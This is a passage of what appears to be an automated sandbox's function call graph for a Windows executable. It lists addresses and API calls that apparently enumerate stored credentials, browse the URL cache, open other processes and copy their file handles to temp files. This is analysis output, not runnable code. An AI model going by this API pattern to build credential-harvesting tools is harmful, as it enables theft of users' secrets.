calls 38694->38695 38696 402c7f 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c99 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402cb3 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402cd5 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cf0 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d0b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402d26 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d3e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d59 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d78 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d93 38715->38716 38717 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38716->38717 38717->38600 38718->38590 38722 40b58d 38719->38722 38721 40b2d1 38721->38664 38723 40b5a4 GetModuleHandleW FindResourceW 38722->38723 38724 40b62e 38722->38724 38725 40b5c2 LoadResource 38723->38725 38727 40b5e7 38723->38727 38724->38721 38726 40b5d0 SizeofResource LockResource 38725->38726 38725->38727 38726->38727 38727->38724 38735 40afcf 38727->38735 38729 40b608 memcpy 38738 40b4d3 memcpy 38729->38738 38731 40b61e 38739 40b3c1 18 API calls 38731->38739 38733 40b626 38740 40b04b 38733->38740 38736 40b04b ??3@YAXPAX 38735->38736 38737 40afd7 ??2@YAPAXI 38736->38737 38737->38729 38738->38731 38739->38733 38741 40b051 ??3@YAXPAX 38740->38741 38742 40b05f 38740->38742 38741->38742 38742->38724 38743->38608 38745 4032c4 38744->38745 38746 40b633 free 38745->38746 38747 403316 38746->38747 38766 44553b 38747->38766 38751 403480 38964 40368c 15 API calls 38751->38964 38753 403489 38754 40b633 free 38753->38754 38755 403495 38754->38755 38755->38610 38756 4033a9 memset memcpy 38757 4033ec wcscmp 38756->38757 38758 40333c 38756->38758 38757->38758 38758->38751 38758->38756 38758->38757 38962 4028e7 11 API calls 38758->38962 38963 40f508 6 API calls 38758->38963 38760 403421 _wcsicmp 38760->38758 38763 444a64 FreeLibrary 38762->38763 38764 444a83 38762->38764 38763->38764 38764->38610 38765->38611 38767 445548 38766->38767 38768 445599 38767->38768 38965 40c768 38767->38965 38769 4455a8 memset 38768->38769 38912 4457f2 38768->38912 39048 403988 38769->39048 38776 445854 38777 4458aa 38776->38777 39173 403c9c memset memset memset memset memset 38776->39173 38779 44594a 38777->38779 38780 4458bb memset memset 38777->38780 38778 445672 39059 403fbe memset memset memset memset memset 38778->39059 38782 4459ed 38779->38782 38783 44595e memset memset 38779->38783 38785 414c2e 16 API calls 38780->38785 38788 445a00 memset memset 38782->38788 38789 445b22 38782->38789 38790 414c2e 16 API calls 38783->38790 38784 4455e5 38784->38778 38802 44560f 38784->38802 38791 4458f9 38785->38791 39196 414c2e 38788->39196 38794 445bca 38789->38794 38795 445b38 memset memset memset 38789->38795 38800 44599c 38790->38800 38801 40b2cc 27 API calls 38791->38801 38812 445c8b memset memset 38794->38812 38862 445cf0 38794->38862 38807 445bd4 38795->38807 38808 445b98 38795->38808 38796 445849 39261 40b1ab free free 38796->39261 38811 40b2cc 27 API calls 38800->38811 38813 445909 38801->38813 38804 4087b3 338 API calls 38802->38804 38823 445621 38804->38823 38806 44589f 39262 40b1ab free free 38806->39262 38820 414c2e 16 API calls 38807->38820 38808->38807 38816 445ba2 38808->38816 38825 4459ac 38811->38825 38814 414c2e 16 API calls 38812->38814 38822 409d1f 6 API calls 38813->38822 38826 445cc9 38814->38826 39334 4099c6 wcslen 38816->39334 38817 4456b2 39249 40b1ab free free 38817->39249 38819 40b2cc 27 API calls 38829 445a4f 38819->38829 38831 445be2 38820->38831 38821 403335 38961 4452e5 45 API calls 38821->38961 38834 445919 38822->38834 39247 4454bf 20 API calls 38823->39247 38824 445823 38824->38796 38842 4087b3 338 API calls 38824->38842 38835 409d1f 6 API calls 38825->38835 38836 409d1f 6 API calls 38826->38836 38827 445879 38827->38806 38846 4087b3 338 API calls 38827->38846 39211 409d1f wcslen wcslen 38829->39211 38840 40b2cc 27 API calls 38831->38840 38832 445d3d 38860 40b2cc 27 API calls 38832->38860 38833 445d88 memset memset memset 38843 414c2e 16 API calls 38833->38843 39263 409b98 GetFileAttributesW 38834->39263 38844 4459bc 38835->38844 38845 445ce1 38836->38845 38837 445bb3 39337 445403 memset 38837->39337 38838 445680 38838->38817 39082 4087b3 memset 38838->39082 38849 445bf3 38840->38849 38842->38824 38852 445dde 38843->38852 39330 409b98 GetFileAttributesW 38844->39330 39354 409b98 GetFileAttributesW 38845->39354 38846->38827 38859 409d1f 6 API calls 38849->38859 38850 445928 38850->38779 39264 40b6ef 38850->39264 38861 40b2cc 27 API calls 38852->38861 38854 4459cb 38854->38782 38871 40b6ef 252 API calls 38854->38871 38858 40b2cc 27 API calls 38864 445a94 38858->38864 38866 445c07 38859->38866 38867 445d54 _wcsicmp 38860->38867 38870 445def 38861->38870 38862->38821 38862->38832 38862->38833 38863 445389 258 API calls 38863->38794 39216 40ae18 38864->39216 38865 44566d 38865->38912 39133 413d4c 38865->39133 38874 445389 258 API calls 38866->38874 38875 445d71 38867->38875 38938 445d67 38867->38938 38869 445665 39248 40b1ab free free 38869->39248 38876 409d1f 6 API calls 38870->38876 38871->38782 38879 445c17 38874->38879 39355 445093 23 API calls 38875->39355 38882 445e03 38876->38882 38878 4456d8 38884 40b2cc 27 API calls 38878->38884 38885 40b2cc 27 API calls 38879->38885 38881 44563c 38881->38869 38887 4087b3 338 API calls 38881->38887 39356 409b98 GetFileAttributesW 38882->39356 38883 40b6ef 252 API calls 38883->38821 38889 4456e2 38884->38889 38890 445c23 38885->38890 38886 445d83 38886->38821 38887->38881 39250 413fa6 _wcsicmp _wcsicmp 38889->39250 38894 409d1f 6 API calls 38890->38894 38892 445e12 38895 445e6b 38892->38895 38899 40b2cc 27 API calls 38892->38899 38897 445c37 38894->38897 39358 445093 23 API calls 38895->39358 38896 4456eb 38902 4456fd memset memset memset memset 38896->38902 38903 4457ea 38896->38903 38904 445389 258 API calls 38897->38904 38898 445b17 39331 40aebe 38898->39331 38906 445e33 38899->38906 39251 409c70 wcscpy wcsrchr 38902->39251 39254 413d29 38903->39254 38910 445c47 38904->38910 38911 409d1f 6 API calls 38906->38911 38908 445e7e 38913 445f67 38908->38913 38916 40b2cc 27 API calls 38910->38916 38917 445e47 38911->38917 38912->38776 39150 403e2d memset memset memset memset memset 38912->39150 38918 40b2cc 27 API calls 38913->38918 38914 445ab2 memset 38919 40b2cc 27 API calls 38914->38919 38921 445c53 38916->38921 39357 409b98 GetFileAttributesW 38917->39357 38923 445f73 38918->38923 38924 445aa1 38919->38924 38920 409c70 2 API calls 38925 44577e 38920->38925 38926 409d1f 6 API calls 38921->38926 38928 409d1f 6 API calls 38923->38928 38924->38898 38924->38914 38929 409d1f 6 API calls 38924->38929 39223 40add4 38924->39223 39228 445389 38924->39228 39237 40ae51 38924->39237 38930 409c70 2 API calls 38925->38930 38931 445c67 38926->38931 38927 445e56 38927->38895 38935 445e83 memset 38927->38935 38932 445f87 38928->38932 38929->38924 38933 44578d 38930->38933 38934 445389 258 API calls 38931->38934 39361 409b98 GetFileAttributesW 38932->39361 38933->38903 38940 40b2cc 27 API calls 38933->38940 38934->38794 38939 40b2cc 27 API calls 38935->38939 38938->38821 38938->38883 38941 445eab 38939->38941 38942 4457a8 38940->38942 38943 409d1f 6 API calls 38941->38943 38944 409d1f 6 API calls 38942->38944 38946 445ebf 38943->38946 38945 4457b8 38944->38945 39253 409b98 GetFileAttributesW 38945->39253 38948 40ae18 9 API calls 38946->38948 38952 445ef5 38948->38952 38949 4457c7 38949->38903 38951 4087b3 338 API calls 38949->38951 38950 40ae51 9 API calls 38950->38952 38951->38903 38952->38950 38953 445f5c 38952->38953 38955 40add4 2 API calls 38952->38955 38956 40b2cc 27 API calls 38952->38956 38957 409d1f 6 API calls 38952->38957 38959 445f3a 38952->38959 39359 409b98 GetFileAttributesW 38952->39359 38954 40aebe FindClose 38953->38954 38954->38913 38955->38952 38956->38952 38957->38952 39360 445093 23 API calls 38959->39360 38961->38758 38962->38760 38963->38758 38964->38753 38966 40c775 38965->38966 39362 40b1ab free free 38966->39362 38968 40c788 39363 40b1ab free free 38968->39363 38970 40c790 39364 40b1ab free free 38970->39364 38972 40c798 38973 40aa04 free 38972->38973 38974 40c7a0 38973->38974 39365 40c274 memset 38974->39365 38979 40a8ab 9 API calls 38980 40c7c3 38979->38980 38981 40a8ab 9 API calls 38980->38981 38982 40c7d0 38981->38982 39394 40c3c3 38982->39394 38986 40c877 38995 40bdb0 38986->38995 38987 40c86c 39436 4053fe 39 API calls 38987->39436 38993 40c7e5 38993->38986 38993->38987 38994 40c634 49 API calls 38993->38994 39419 40a706 38993->39419 38994->38993 39604 404363 38995->39604 38998 40bf5d 39624 40440c 38998->39624 39000 40bdee 39000->38998 39003 40b2cc 27 API calls 39000->39003 39001 40bddf CredEnumerateW 39001->39000 39004 40be02 wcslen 39003->39004 39004->38998 39011 40be1e 39004->39011 39005 40be26 wcsncmp 39005->39011 39008 40be7d memset 39009 40bea7 memcpy 39008->39009 39008->39011 39010 40bf11 wcschr 39009->39010 39009->39011 39010->39011 39011->38998 39011->39005 39011->39008 39011->39009 39011->39010 39012 40b2cc 27 API calls 39011->39012 39014 40bf43 LocalFree 39011->39014 39627 40bd5d 28 API calls 39011->39627 39628 404423 39011->39628 39013 40bef6 _wcsnicmp 39012->39013 39013->39010 39013->39011 39014->39011 39015 4135f7 39641 4135e0 39015->39641 39049 40399d 39048->39049 39670 403a16 39049->39670 39052 403a12 wcsrchr 39052->38784 39055 4039a3 39056 4039f4 39055->39056 39058 403a09 39055->39058 39681 40a02c CreateFileW 39055->39681 39057 4099c6 2 API calls 39056->39057 39056->39058 39057->39058 39684 40b1ab free free 39058->39684 39060 414c2e 16 API calls 39059->39060 39061 404048 39060->39061 39062 414c2e 16 API calls 39061->39062 39063 404056 39062->39063 39064 409d1f 6 API calls 39063->39064 39065 404073 39064->39065 39066 409d1f 6 API calls 39065->39066 39067 40408e 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 4040a6 39068->39069 39070 403af5 20 API calls 39069->39070 39071 4040ba 39070->39071 39072 403af5 20 API calls 39071->39072 39073 4040cb 39072->39073 39711 40414f memset 39073->39711 39075 404140 39725 40b1ab free free 39075->39725 39076 4040ec memset 39080 4040e0 39076->39080 39078 404148 39078->38838 39079 4099c6 2 API calls 39079->39080 39080->39075 39080->39076 39080->39079 39081 40a8ab 9 API calls 39080->39081 39081->39080 39738 40a6e6 WideCharToMultiByte 39082->39738 39084 4087ed 39739 4095d9 memset 39084->39739 39134 40b633 free 39133->39134 39135 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39134->39135 39136 413f00 Process32NextW 39135->39136 39137 413da5 OpenProcess 39136->39137 39138 413f17 CloseHandle 39136->39138 39139 413eb0 39137->39139 39140 413df3 memset 39137->39140 39138->38878 39139->39136 39142 413ebf free 39139->39142 39143 4099f4 3 API calls 39139->39143 39977 413f27 39140->39977 39142->39139 39143->39139 39145 413e37 GetModuleHandleW 39146 413e1f 39145->39146 39147 413e46 GetProcAddress 39145->39147 39146->39145 39982 413959 39146->39982 39998 413ca4 39146->39998 39147->39146 39149 413ea2 CloseHandle 39149->39139 39151 414c2e 16 API calls 39150->39151 39152 403eb7 39151->39152 39153 414c2e 16 API calls 39152->39153 39154 403ec5 39153->39154 39155 409d1f 6 API calls 39154->39155 39156 403ee2 39155->39156 39157 409d1f 6 API calls 39156->39157 39158 403efd 39157->39158 39159 409d1f 6 API calls 39158->39159 39160 403f15 39159->39160 39161 403af5 20 API calls 39160->39161 39162 403f29 39161->39162 39163 403af5 20 API calls 39162->39163 39164 403f3a 39163->39164 39165 40414f 33 API calls 39164->39165 39171 403f4f 39165->39171 39166 403faf 40012 40b1ab free free 39166->40012 39168 403f5b memset 39168->39171 39169 403fb7 39169->38824 39170 4099c6 2 API calls 39170->39171 39171->39166 39171->39168 39171->39170 39172 40a8ab 9 API calls 39171->39172 39172->39171 39174 414c2e 16 API calls 39173->39174 39175 403d26 39174->39175 39176 414c2e 16 API calls 39175->39176 39177 403d34 39176->39177 39178 409d1f 6 API calls 39177->39178 39179 403d51 39178->39179 39180 409d1f 6 API calls 39179->39180 39181 403d6c 39180->39181 39182 409d1f 6 API calls 39181->39182 39183 403d84 39182->39183 39184 403af5 20 API calls 39183->39184 39185 403d98 39184->39185 39186 403af5 20 API calls 39185->39186 39187 403da9 39186->39187 39188 40414f 33 API calls 39187->39188 39194 403dbe 39188->39194 39189 403e1e 40013 40b1ab free free 39189->40013 39190 403dca memset 39190->39194 39192 403e26 39192->38827 39193 4099c6 2 API calls 39193->39194 39194->39189 39194->39190 39194->39193 39195 40a8ab 9 API calls 39194->39195 39195->39194 39197 414b81 9 API calls 39196->39197 39198 414c40 39197->39198 39199 414c73 memset 39198->39199 40014 409cea 39198->40014 39202 414c94 39199->39202 39201 414c64 39201->38819 40017 414592 RegOpenKeyExW 39202->40017 39205 414cc1 39206 414cf4 wcscpy 39205->39206 40018 414bb0 wcscpy 39205->40018 39206->39201 39208 414cd2 40019 4145ac RegQueryValueExW 39208->40019 39210 414ce9 RegCloseKey 39210->39206 39212 409d62 39211->39212 39213 409d43 wcscpy 39211->39213 39212->38858 39214 409719 2 API calls 39213->39214 39215 409d51 wcscat 39214->39215 39215->39212 39217 40aebe FindClose 39216->39217 39218 40ae21 39217->39218 39219 4099c6 2 API calls 39218->39219 39220 40ae35 39219->39220 39221 409d1f 6 API calls 39220->39221 39222 40ae49 39221->39222 39222->38924 39224 40ade0 39223->39224 39225 40ae0f 39223->39225 39224->39225 39226 40ade7 wcscmp 39224->39226 39225->38924 39226->39225 39227 40adfe wcscmp 39226->39227 39227->39225 39229 40ae18 9 API calls 39228->39229 39235 4453c4 39229->39235 39230 40ae51 9 API calls 39230->39235 39231 4453f3 39232 40aebe FindClose 39231->39232 39234 4453fe 39232->39234 39233 40add4 2 API calls 39233->39235 39234->38924 39235->39230 39235->39231 39235->39233 39236 445403 253 API calls 39235->39236 39236->39235 39238 40ae7b FindNextFileW 39237->39238 39239 40ae5c FindFirstFileW 39237->39239 39240 40ae94 39238->39240 39241 40ae8f 39238->39241 39239->39240 39243 40aeb6 39240->39243 39244 409d1f 6 API calls 39240->39244 39242 40aebe FindClose 39241->39242 39242->39240 39243->38924 39244->39243 39247->38881 39248->38865 39249->38865 39250->38896 39252 409c89 39251->39252 39252->38920 39253->38949 39255 413d39 39254->39255 39256 413d2f FreeLibrary 39254->39256 39257 40b633 free 39255->39257 39256->39255 39258 413d42 39257->39258 39259 40b633 free 39258->39259 39260 413d4a 39259->39260 39260->38912 39261->38776 39262->38777 39263->38850 39265 44db70 39264->39265 39266 40b6fc memset 39265->39266 39267 409c70 2 API calls 39266->39267 39268 40b732 wcsrchr 39267->39268 39269 40b743 39268->39269 39270 40b746 memset 39268->39270 39269->39270 39271 40b2cc 27 API calls 39270->39271 39272 40b76f 39271->39272 39273 409d1f 6 API calls 39272->39273 39274 40b783 39273->39274 40020 409b98 GetFileAttributesW 39274->40020 39276 40b792 39277 409c70 2 API calls 39276->39277 39291 40b7c2 39276->39291 39279 40b7a5 39277->39279 39281 40b2cc 27 API calls 39279->39281 39285 40b7b2 39281->39285 39282 40b837 CloseHandle 39284 40b83e memset 39282->39284 39283 40b817 40055 409a45 GetTempPathW 39283->40055 40054 40a6e6 WideCharToMultiByte 39284->40054 39289 409d1f 6 API calls 39285->39289 39287 40b827 CopyFileW 39287->39284 39289->39291 39290 40b866 39292 444432 121 API calls 39290->39292 40021 40bb98 39291->40021 39293 40b879 39292->39293 39294 40bad5 39293->39294 39295 40b273 27 API calls 39293->39295 39296 40baeb 39294->39296 39297 40bade DeleteFileW 39294->39297 39298 40b89a 39295->39298 39299 40b04b ??3@YAXPAX 39296->39299 39297->39296 39300 438552 134 API calls 39298->39300 39301 40baf3 39299->39301 39302 40b8a4 39300->39302 39301->38779 39303 40bacd 39302->39303 39305 4251c4 137 API calls 39302->39305 39304 443d90 111 API calls 39303->39304 39304->39294 39328 40b8b8 39305->39328 39306 40bac6 40067 424f26 123 API calls 39306->40067 39307 40b8bd memset 40058 425413 17 API calls 39307->40058 39310 425413 17 API calls 39310->39328 39313 40a71b MultiByteToWideChar 39313->39328 39314 40a734 MultiByteToWideChar 39314->39328 39317 40b9b5 memcmp 39317->39328 39318 4099c6 2 API calls 39318->39328 39319 404423 37 API calls 39319->39328 39322 40bb3e memset memcpy 40068 40a734 MultiByteToWideChar 39322->40068 39323 4251c4 137 API calls 39323->39328 39325 40bb88 LocalFree 39325->39328 39328->39306 39328->39307 39328->39310 39328->39313 39328->39314 39328->39317 39328->39318 39328->39319 39328->39322 39328->39323 39329 40ba5f memcmp 39328->39329 40059 4253ef 16 API calls 39328->40059 40060 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39328->40060 40061 4253af 17 API calls 39328->40061 40062 4253cf 17 API calls 39328->40062 40063 447280 memset 39328->40063 40064 447960 memset memcpy memcpy memcpy 39328->40064 40065 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39328->40065 40066 447920 memcpy memcpy memcpy 39328->40066 39329->39328 39330->38854 39332 40aed1 39331->39332 39333 40aec7 FindClose 39331->39333 39332->38789 39333->39332 39335 4099d7 39334->39335 39336 4099da memcpy 39334->39336 39335->39336 39336->38837 39338 40b2cc 27 API calls 39337->39338 39339 44543f 39338->39339 39340 409d1f 6 API calls 39339->39340 39341 44544f 39340->39341 40160 409b98 GetFileAttributesW 39341->40160 39343 445476 39346 40b2cc 27 API calls 39343->39346 39344 44545e 39344->39343 39345 40b6ef 252 API calls 39344->39345 39345->39343 39347 445482 39346->39347 39348 409d1f 6 API calls 39347->39348 39349 445492 39348->39349 40161 409b98 GetFileAttributesW 39349->40161 39351 4454a1 39352 4454b9 39351->39352 39353 40b6ef 252 API calls 39351->39353 39352->38863 39353->39352 39354->38862 39355->38886 39356->38892 39357->38927 39358->38908 39359->38952 39360->38952 39361->38938 39362->38968 39363->38970 39364->38972 39366 414c2e 16 API calls 39365->39366 39367 40c2ae 39366->39367 39437 40c1d3 39367->39437 39372 40c3be 39389 40a8ab 39372->39389 39373 40afcf 2 API calls 39374 40c2fd FindFirstUrlCacheEntryW 39373->39374 39375 40c3b6 39374->39375 39376 40c31e wcschr 39374->39376 39377 40b04b ??3@YAXPAX 39375->39377 39378 40c331 39376->39378 39379 40c35e FindNextUrlCacheEntryW 39376->39379 39377->39372 39380 40a8ab 9 API calls 39378->39380 39379->39376 39381 40c373 GetLastError 39379->39381 39384 40c33e wcschr 39380->39384 39382 40c3ad FindCloseUrlCache 39381->39382 39383 40c37e 39381->39383 39382->39375 39385 40afcf 2 API calls 39383->39385 39384->39379 39386 40c34f 39384->39386 39387 40c391 FindNextUrlCacheEntryW 39385->39387 39388 40a8ab 9 API calls 39386->39388 39387->39376 39387->39382 39388->39379 39531 40a97a 39389->39531 39392 40a8cc 39392->38979 39393 40a8d0 7 API calls 39393->39392 39536 40b1ab free free 39394->39536 39396 40c3dd 39397 40b2cc 27 API calls 39396->39397 39398 40c3e7 39397->39398 39537 414592 RegOpenKeyExW 39398->39537 39400 40c3f4 39401 40c50e 39400->39401 39402 40c3ff 39400->39402 39416 405337 39401->39416 39403 40a9ce 4 API calls 39402->39403 39404 40c418 memset 39403->39404 39538 40aa1d 39404->39538 39407 40c471 39409 40c47a _wcsupr 39407->39409 39408 40c505 RegCloseKey 39408->39401 39410 40a8d0 7 API calls 39409->39410 39411 40c498 39410->39411 39412 40a8d0 7 API calls 39411->39412 39413 40c4ac memset 39412->39413 39414 40aa1d 39413->39414 39415 40c4e4 RegEnumValueW 39414->39415 39415->39408 39415->39409 39540 405220 39416->39540 39420 4099c6 2 API calls 39419->39420 39421 40a714 _wcslwr 39420->39421 39422 40c634 39421->39422 39597 405361 39422->39597 39425 40c65c wcslen 39600 4053b6 39 API calls 39425->39600 39426 40c71d wcslen 39426->38993 39428 40c677 39429 40c713 39428->39429 39601 40538b 39 API calls 39428->39601 39603 4053df 39 API calls 39429->39603 39432 40c6a5 39432->39429 39433 40c6a9 memset 39432->39433 39434 40c6d3 39433->39434 39602 40c589 43 API calls 39434->39602 39436->38986 39438 40ae18 9 API calls 39437->39438 39444 40c210 39438->39444 39439 40ae51 9 API calls 39439->39444 39440 40c264 39441 40aebe FindClose 39440->39441 39443 40c26f 39441->39443 39442 40add4 2 API calls 39442->39444 39449 40e5ed memset memset 39443->39449 39444->39439 39444->39440 39444->39442 39445 40c231 _wcsicmp 39444->39445 39446 40c1d3 35 API calls 39444->39446 39445->39444 39447 40c248 39445->39447 39446->39444 39462 40c084 22 API calls 39447->39462 39450 414c2e 16 API calls 39449->39450 39451 40e63f 39450->39451 39452 409d1f 6 API calls 39451->39452 39453 40e658 39452->39453 39463 409b98 GetFileAttributesW 39453->39463 39455 40e667 39456 40e680 39455->39456 39457 409d1f 6 API calls 39455->39457 39464 409b98 GetFileAttributesW 39456->39464 39457->39456 39459 40e68f 39461 40c2d8 39459->39461 39465 40e4b2 39459->39465 39461->39372 39461->39373 39462->39444 39463->39455 39464->39459 39486 40e01e 39465->39486 39467 40e593 39468 40e5b0 39467->39468 39469 40e59c DeleteFileW 39467->39469 39471 40b04b ??3@YAXPAX 39468->39471 39469->39468 39470 40e521 39470->39467 39509 40e175 39470->39509 39472 40e5bb 39471->39472 39474 40e5c4 CloseHandle 39472->39474 39475 40e5cc 39472->39475 39474->39475 39477 40b633 free 39475->39477 39476 40e573 39479 40e584 39476->39479 39480 40e57c CloseHandle 39476->39480 39478 40e5db 39477->39478 39482 40b633 free 39478->39482 39530 40b1ab free free 39479->39530 39480->39479 39481 40e540 39481->39476 39529 40e2ab 30 API calls 39481->39529 39484 40e5e3 39482->39484 39484->39461 39487 406214 22 API calls 39486->39487 39488 40e03c 39487->39488 39489 40e16b 39488->39489 39490 40dd85 74 API calls 39488->39490 39489->39470 39491 40e06b 39490->39491 39491->39489 39492 40afcf ??2@YAPAXI ??3@YAXPAX 39491->39492 39493 40e08d OpenProcess 39492->39493 39494 40e0a4 GetCurrentProcess DuplicateHandle 39493->39494 39498 40e152 39493->39498 39495 40e0d0 GetFileSize 39494->39495 39496 40e14a CloseHandle 39494->39496 39499 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39495->39499 39496->39498 39497 40e160 39501 40b04b ??3@YAXPAX 39497->39501 39498->39497 39500 406214 22 API calls 39498->39500 39502 40e0ea 39499->39502 39500->39497 39501->39489 39503 4096dc CreateFileW 39502->39503 39504 40e0f1 CreateFileMappingW 39503->39504 39505 40e140 CloseHandle CloseHandle 39504->39505 39506 40e10b MapViewOfFile 39504->39506 39505->39496 39507 40e13b CloseHandle 39506->39507 39508 40e11f WriteFile UnmapViewOfFile 39506->39508 39507->39505 39508->39507 39510 40e18c 39509->39510 39511 406b90 11 API calls 39510->39511 39512 40e19f 39511->39512 39513 40e1a7 memset 39512->39513 39514 40e299 39512->39514 39519 40e1e8 39513->39519 39515 4069a3 ??3@YAXPAX free 39514->39515 39516 40e2a4 39515->39516 39516->39481 39517 406e8f 13 API calls 39517->39519 39518 406b53 SetFilePointerEx ReadFile 39518->39519 39519->39517 39519->39518 39520 40e283 39519->39520 39521 40dd50 _wcsicmp 39519->39521 39525 40742e 8 API calls 39519->39525 39526 40aae3 wcslen wcslen _memicmp 39519->39526 39527 40e244 _snwprintf 39519->39527 39522 40e291 39520->39522 39523 40e288 free 39520->39523 39521->39519 39524 40aa04 free 39522->39524 39523->39522 39524->39514 39525->39519 39526->39519 39528 40a8d0 7 API calls 39527->39528 39528->39519 39529->39481 39530->39467 39533 40a980 39531->39533 39532 40a8bb 39532->39392 39532->39393 39533->39532 39534 40a995 _wcsicmp 39533->39534 39535 40a99c wcscmp 39533->39535 39534->39533 39535->39533 39536->39396 39537->39400 39539 40aa23 RegEnumValueW 39538->39539 39539->39407 39539->39408 39541 405335 39540->39541 39542 40522a 39540->39542 39541->38993 39543 40b2cc 27 API calls 39542->39543 39544 405234 39543->39544 39545 40a804 8 API calls 39544->39545 39546 40523a 39545->39546 39585 40b273 39546->39585 39548 405248 _mbscpy _mbscat GetProcAddress 39549 40b273 27 API calls 39548->39549 39550 405279 39549->39550 39588 405211 GetProcAddress 39550->39588 39552 405282 39553 40b273 27 API calls 39552->39553 39554 40528f 39553->39554 39589 405211 GetProcAddress 39554->39589 39556 405298 39586 40b58d 27 API calls 39585->39586 39587 40b18c 39586->39587 39587->39548 39588->39552 39589->39556 39598 405220 39 API calls 39597->39598 39599 405369 39598->39599 39599->39425 39599->39426 39600->39428 39601->39432 39602->39429 39603->39426 39605 40440c FreeLibrary 39604->39605 39606 40436d 39605->39606 39607 40a804 8 API calls 39606->39607 39608 404377 39607->39608 39609 404383 39608->39609 39610 404405 39608->39610 39611 40b273 27 API calls 39609->39611 39610->38998 39610->39000 39610->39001 39612 40438d GetProcAddress 39611->39612 39613 40b273 27 API calls 39612->39613 39614 4043a7 GetProcAddress 39613->39614 39615 40b273 27 API calls 39614->39615 39616 4043ba GetProcAddress 39615->39616 39617 40b273 27 API calls 39616->39617 39625 404413 FreeLibrary 39624->39625 39626 40441e 39624->39626 39625->39626 39626->39015 39627->39011 39629 40442e 39628->39629 39631 40447e 39628->39631 39631->39011 39642 4135f6 39641->39642 39643 4135eb FreeLibrary 39641->39643 39643->39642 39671 403a29 39670->39671 39685 403bed memset memset 39671->39685 39673 403ae7 39698 40b1ab free free 39673->39698 39674 403a3f memset 39679 403a2f 39674->39679 39676 403aef 39676->39055 39677 409d1f 6 API calls 39677->39679 39678 409b98 GetFileAttributesW 39678->39679 39679->39673 39679->39674 39679->39677 39679->39678 39680 40a8d0 7 API calls 39679->39680 39680->39679 39682 40a051 GetFileTime CloseHandle 39681->39682 39683 4039ca CompareFileTime 39681->39683 39682->39683 39683->39055 39684->39052 39686 414c2e 16 API calls 39685->39686 39687 403c38 39686->39687 39688 409719 2 API calls 39687->39688 39689 403c3f wcscat 39688->39689 39690 414c2e 16 API calls 39689->39690 39691 403c61 39690->39691 39692 409719 2 API calls 39691->39692 39693 403c68 wcscat 39692->39693 39699 403af5 39693->39699 39696 403af5 20 API calls 39697 403c95 39696->39697 39697->39679 39698->39676 39700 403b02 39699->39700 39701 40ae18 9 API calls 39700->39701 39703 403b37 39701->39703 39702 40ae51 9 API calls 39702->39703 39703->39702 39704 403bdb 39703->39704 39705 40add4 wcscmp wcscmp 39703->39705 39708 40ae18 9 API calls 39703->39708 39709 40aebe FindClose 39703->39709 39710 40a8d0 7 API calls 39703->39710 39706 40aebe FindClose 39704->39706 39705->39703 39707 403be6 39706->39707 39707->39696 39708->39703 39709->39703 39710->39703 39712 409d1f 6 API calls 39711->39712 39713 404190 39712->39713 39726 409b98 GetFileAttributesW 39713->39726 39715 40419c 39716 4041a7 6 API calls 39715->39716 39717 40435c 39715->39717 39719 40424f 39716->39719 39717->39080 39719->39717 39720 40425e memset 39719->39720 39722 409d1f 6 API calls 39719->39722 39723 40a8ab 9 API calls 39719->39723 39727 414842 39719->39727 39720->39719 39721 404296 wcscpy 39720->39721 39721->39719 39722->39719 39724 4042b6 memset memset _snwprintf wcscpy 39723->39724 39724->39719 39725->39078 39726->39715 39730 41443e 39727->39730 39729 414866 39729->39719 39731 41444b 39730->39731 39732 414451 39731->39732 39733 4144a3 GetPrivateProfileStringW 39731->39733 39734 414491 39732->39734 39735 414455 wcschr 39732->39735 39733->39729 39737 414495 WritePrivateProfileStringW 39734->39737 39735->39734 39736 414463 _snwprintf 39735->39736 39736->39737 39737->39729 39738->39084 39740 40b2cc 27 API calls 39739->39740 39741 409615 39740->39741 40004 413f4f 39977->40004 39980 413f37 K32GetModuleFileNameExW 39981 413f4a 39980->39981 39981->39146 39983 413969 wcscpy 39982->39983 39984 41396c wcschr 39982->39984 39987 413a3a 39983->39987 39984->39983 39986 41398e 39984->39986 40009 4097f7 wcslen wcslen _memicmp 39986->40009 39987->39146 39989 41399a 39990 4139a4 memset 39989->39990 39991 4139e6 39989->39991 40010 409dd5 GetWindowsDirectoryW wcscpy 39990->40010 39993 413a31 wcscpy 39991->39993 39994 4139ec memset 39991->39994 39993->39987 40011 409dd5 GetWindowsDirectoryW wcscpy 39994->40011 39995 4139c9 wcscpy wcscat 39995->39987 39997 413a11 memcpy wcscat 39997->39987 39999 413cb0 GetModuleHandleW 39998->39999 40000 413cda 39998->40000 39999->40000 40001 413cbf GetProcAddress 39999->40001 40002 413ce3 GetProcessTimes 40000->40002 40003 413cf6 40000->40003 40001->40000 40002->39149 40003->39149 40005 413f2f 40004->40005 40006 413f54 40004->40006 40005->39980 40005->39981 40007 40a804 8 API calls 40006->40007 40008 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40007->40008 40008->40005 40009->39989 40010->39995 40011->39997 40012->39169 40013->39192 40015 409cf9 GetVersionExW 40014->40015 40016 409d0a 40014->40016 40015->40016 40016->39199 40016->39201 40017->39205 40018->39208 40019->39210 40020->39276 40022 40bba5 40021->40022 40069 40cc26 40022->40069 40025 40bd4b 40090 40cc0c 40025->40090 40030 40b2cc 27 API calls 40031 40bbef 40030->40031 40097 40ccf0 _wcsicmp 40031->40097 40033 40bbf5 40033->40025 40098 40ccb4 6 API calls 40033->40098 40035 40bc26 40036 40cf04 17 API calls 40035->40036 40037 40bc2e 40036->40037 40038 40bd43 40037->40038 40039 40b2cc 27 API calls 40037->40039 40040 40cc0c 4 API calls 40038->40040 40041 40bc40 40039->40041 40040->40025 40099 40ccf0 